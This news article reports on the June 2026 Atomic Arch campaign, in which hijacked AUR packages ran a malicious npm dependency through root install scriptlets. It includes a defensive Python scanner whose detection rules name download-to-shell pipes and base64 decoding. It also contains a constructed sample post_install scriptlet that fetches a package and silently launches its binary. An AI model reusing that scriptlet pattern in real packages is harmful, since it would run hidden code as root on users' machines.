
Rust-powered malware hits 1,500 Arch Linux packages in Atomic Arch campaign

A rogue AUR takeover turned abandoned Arch packages into an install-time malware trap, with Sonatype tying the campaign to about 1,500 packages.

Sam Ortega · 2 min read
Published
The real problem in Atomic Arch was not that the malware was written in Rust. It was that attackers turned abandoned Arch User Repository packages into a supply-chain trap, then used package maintenance itself as the delivery channel for credential theft and data exfiltration.

Sonatype identified the campaign and said the first wave surfaced on June 11, 2026, when attackers took over legitimate but orphaned AUR projects and altered PKGBUILDs to pull in a malicious npm dependency during installation. On June 12, a second wave added Bun-based installation paths, widening the blast radius beyond the original npm-driven payload. Sonatype tracked the activity as Sonatype-2026-003775 and gave it a CVSS score of 8.7.


The malicious dependency at the center of the first wave was atomic-lockfile. Sonatype said analysis linked it to Linux payload behavior associated with credential harvesting, stealth, anti-debugging, and possible exfiltration. Community maintainers on the Arch mailing lists described the same pattern repeating across packages: a post_install scriptlet would run npm install atomic-lockfile and then launch an ELF payload. Because pacman executes .install scriptlets as root on the installing machine, that payload ran with full privileges, and the upstream source the package builds from did not need to change at all. That made the compromise harder to spot than a straight source-code swap: the package contents could look ordinary while the install step did the damage.

Arch Linux publicly acknowledged the incident on June 12, saying it was seeing a high volume of malicious package adoptions and updates in the AUR. The project warned users that they might run into issues creating new AUR accounts, pushing package updates, or adopting and creating packages while the response continued. Arch staff also told users of AUR packages to review PKGBUILD and install script changes carefully and to report suspicious commits on the aur-general mailing list.
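One way to carry out the review Arch asked for, covering both the post_install pattern described above and the advice to check PKGBUILD and install script changes, is a small scanner that pulls the function bodies out of a PKGBUILD and the .install scriptlet it names and flags install-time behaviour. The script below is an added example written for this page, not Arch's, Sonatype's or the campaign's code. Its rules, the package name, the file paths and both sample files are constructed for the demo; the sample scriptlet copies the reported shape (npm install atomic-lockfile followed by launching a binary) but is not a real AUR package.

```python
"""Heuristic audit of an AUR package's PKGBUILD and .install scriptlet for
install-time execution, modelled on the Atomic Arch pattern. Added example,
not Arch's or Sonatype's tooling; rules, names and samples are assumptions."""
import re
from typing import Dict, List, Optional, Tuple

# Scriptlet functions pacman runs as root on the installing machine.
HOOKS = ("pre_install", "post_install", "pre_upgrade", "post_upgrade",
         "pre_remove", "post_remove")
# Functions makepkg runs as the building user.
BUILD_FUNCS = ("prepare", "build", "check", "package")

# Heuristic rules (assumed, not an official detection list): (regex, description).
RULES = [
    (re.compile(r"\b(npm|npx|bun|bunx|pnpm|yarn)\b"), "invokes a JS package manager or runtime"),
    (re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z|da)?sh\b"), "pipes a download into a shell"),
    (re.compile(r"\bbase64\b.*(-d|--decode)"), "decodes a base64 blob"),
    (re.compile(r"\bchmod\b.*(\+x|7)"), "marks a file executable"),
    (re.compile(r"(^|[\s;&|])(\./|/tmp/|/dev/shm/|\$HOME/|~/)\S*"), "touches a relative, temp or home path"),
    (re.compile(r"\b(nohup|setsid)\b|(?<![&<>])&\s*$"), "backgrounds a process"),
]

FUNC_START = re.compile(r"^\s*(?:function\s+)?([A-Za-z_][A-Za-z0-9_]*)\s*\(\)\s*\{?\s*$")
Finding = Tuple[str, str, int, str, str]  # (file, function, line_no, rule, line)


def parse_functions(text: str) -> Dict[str, List[Tuple[int, str]]]:
    """Map each shell function name to its body lines, using the usual
    'name() {' ... '}' layout of PKGBUILDs and .install files."""
    funcs: Dict[str, List[Tuple[int, str]]] = {}
    current: Optional[str] = None
    for no, line in enumerate(text.splitlines(), 1):
        if current is None:
            m = FUNC_START.match(line)
            if m:
                current = m.group(1)
                funcs[current] = []
        elif line.strip() == "}":
            current = None
        else:
            funcs[current].append((no, line))
    return funcs


def scan(text: str, filename: str, only_funcs: Tuple[str, ...] = ()) -> List[Finding]:
    """Run RULES over the body of each selected function; comment lines are skipped."""
    findings: List[Finding] = []
    for name, body in parse_functions(text).items():
        if only_funcs and name not in only_funcs:
            continue
        for no, line in body:
            if line.strip().startswith("#"):
                continue
            for rx, desc in RULES:
                if rx.search(line):
                    findings.append((filename, name, no, desc, line.strip()))
    return findings


def audit_package(pkgbuild: str, install_files: Dict[str, str]) -> List[Finding]:
    """Audit a PKGBUILD plus the scriptlet it names via 'install=' ($pkgname expanded)."""
    m = re.search(r"^\s*pkgname\s*=\s*['\"]?([^'\"\s()]+)", pkgbuild, re.M)
    pkgname = m.group(1) if m else ""
    findings = scan(pkgbuild, "PKGBUILD", BUILD_FUNCS)
    for m in re.finditer(r"^\s*install\s*=\s*['\"]?([^'\"\s]+)", pkgbuild, re.M):
        fname = m.group(1).replace("${pkgname}", pkgname).replace("$pkgname", pkgname)
        if fname in install_files:
            findings += scan(install_files[fname], fname, HOOKS)
        else:
            findings.append(("PKGBUILD", "-", 0, "names a scriptlet that was not supplied", fname))
    return findings


# Constructed sample inputs (not real AUR packages). The PKGBUILD is clean; the
# scriptlet reproduces the reported shape: a post_install hook that runs
# 'npm install atomic-lockfile' and then launches a binary. Paths are made up.
SAMPLE_PKGBUILD = r'''
pkgname=example-tool
pkgver=1.2.3
pkgrel=2
arch=('x86_64')
install=$pkgname.install
source=("https://example.invalid/$pkgname-$pkgver.tar.gz")
sha256sums=('SKIP')

package() {
  cd "$srcdir/$pkgname-$pkgver"
  install -Dm755 example-tool "$pkgdir/usr/bin/example-tool"
}
'''

SAMPLE_INSTALL = r'''
post_install() {
  cd /tmp && npm install atomic-lockfile >/dev/null 2>&1
  chmod +x /tmp/node_modules/atomic-lockfile/bin/update
  nohup /tmp/node_modules/atomic-lockfile/bin/update >/dev/null 2>&1 &
}

post_upgrade() {
  post_install
}
'''

if __name__ == "__main__":
    for f in audit_package(SAMPLE_PKGBUILD, {"example-tool.install": SAMPLE_INSTALL}):
        print("%s:%d [%s] %s -> %s" % (f[0], f[2], f[1], f[3], f[4]))
```

The PKGBUILD's package() function produces no findings while every hit lands in post_install, which is the point: makepkg runs the PKGBUILD functions as the building user, but pacman runs the .install hooks as root on the machine that installs the package, so a clean source tree and an ordinary-looking package() say nothing about what the scriptlet does. Treat the rules as triage, not proof; the real check is still reading the diff of both files before adopting or updating a package.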

The scale was striking. Arch’s package index lists 114,708 packages in the AUR, and Sonatype said the campaign may affect roughly 1,500 of them across multiple waves. Community analysis pushed that number even higher, with some reports placing the campaign at 1,619 unique AUR package names. Even at the lower figure, this was not a tiny corner-case compromise. It was a direct hit on the trust model that makes the AUR usable in the first place.

Arch later said it was actively working to track down existing malicious commits and prevent new ones from being pushed. That is the lesson Atomic Arch leaves behind: on Arch-based systems, the risk is not just what a package says it is, but what its build and install scripts can be turned into after an abandoned repo changes hands.

This article was produced by Prism’s automated news system from verified source data, official records, and press releases, then run through automated quality and moderation checks before publishing. The system is built and supervised by the people who set the standards it runs under. Read our full AI policy.
